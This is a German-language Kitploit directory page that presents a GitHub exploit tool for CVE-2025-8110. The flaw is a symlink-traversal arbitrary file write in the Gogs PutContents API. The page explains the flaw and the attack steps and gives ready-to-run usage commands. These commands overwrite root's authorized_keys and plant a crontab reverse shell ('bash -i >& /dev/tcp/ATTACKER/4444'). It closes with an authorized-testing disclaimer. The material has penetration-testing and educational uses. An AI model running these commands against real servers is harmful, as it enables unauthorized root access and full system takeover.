Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110 — CVE-2025-8110 — Gogs <= 0.13.3 Beliebiger Dateischreibvorgang durch Symlink-Traversal in der PutContents-API | Kitploit
Tools/GitHubGitHub/3jee/cve-2025-8110
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHub3jee/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 — Gogs <= 0.13.3 Beliebiger Dateischreibvorgang durch Symlink-Traversal in der PutContents-API

Repository anzeigen
2vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8110 — Gogs <= 0.13.3 - Beliebiges Datei-Schreiben via Symlink-Traversal

Übersicht

Gogs <= 0.13.3 ist anfällig für beliebiges Datei-Schreiben über die PutContents-API (/api/v1/repos/:owner/:repo/contents/:path).

Die API validiert Dateipfade auf Verzeichnistraversierungs-Sequenzen (../), löst jedoch keine symbolischen Links auf, bevor sie schreibt. Ein authentifizierter Benutzer kann einen Commit mit einem Symlink pushen, der auf eine beliebige Datei auf dem Server verweist, und dann PutContents auf diesem Symlink aufrufen, um die Zieldatei mit einem vom Angreifer kontrollierten Inhalt zu überschreiben.

Wenn Gogs als root läuft (Standard in Docker und vielen Bereitstellungen), führt dies zu einer vollständigen Systemkompromittierung.

DetailWert
CVECVE-2025-8110
BetroffenGogs <= 0.13.3
TypAuthentifiziertes beliebiges Datei-Schreiben → RCE
CVSS8.8 (Hoch)
KomponentePutContents-API

Voraussetzungen

  • Python 3.10+
  • requests (pip install requests)
  • git CLI
  • Ein gültiges Gogs-Konto (oder offene Selbstregistrierung auf dem Ziel)

Verwendung

root@kitploit:~
# Wegwerf-Konto selbst registrieren + SSH-Public-Key für root schreiben
python3 CVE-2025-8110.py --url http://target:3001 --register \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# Mit bestehenden Anmeldedaten
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# Reverse Shell via Crontab
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /etc/crontab \
    --content '* * * * * root bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'

# Bereinigen des Exploit-Repos nach Gebrauch
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup

Funktionsweise

  1. Authentifizierung — Einloggen (oder selbst registrieren) und ein API-Token erstellen.
  2. Repo erstellen — Ein neues Repository mit einer README-Datei über die Web-Oberfläche initialisieren.
  3. Symlink pushen — Das Repository lokal klonen, einen Symlink erstellen, der auf die Zieldatei verweist (z.B. /root/.ssh/authorized_keys), committen und pushen.
  4. Durch den Symlink schreiben — Die PutContents-API mit dem Symlink-Dateinamen aufrufen. Gogs löst den Symlink auf der Festplatte auf und schreibt den Inhalt des Angreifers in die echte Datei als Benutzer des Gogs-Prozesses (oft root).

Optionen

root@kitploit:~
--url             Basis-URL von Gogs (z.B. http://target:3001)
-u, --user        Gogs-Benutzername
-p, --password    Gogs-Passwort
--register        Wegwerf-Konto selbst registrieren (kein Captcha)
--target-file     Absoluter Pfad zum Überschreiben auf dem Server
--content         Zeichenfolge, die geschrieben werden soll
--content-file    Lokale Datei, deren Inhalt geschrieben werden soll
--repo            Name des zu erstellenden Repos (Standard: zufällig)
--link-name      Symlink-Dateiname im Repo (Standard: payload)
--cleanup         Lösche das Exploit-Repo nach dem Schreiben

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen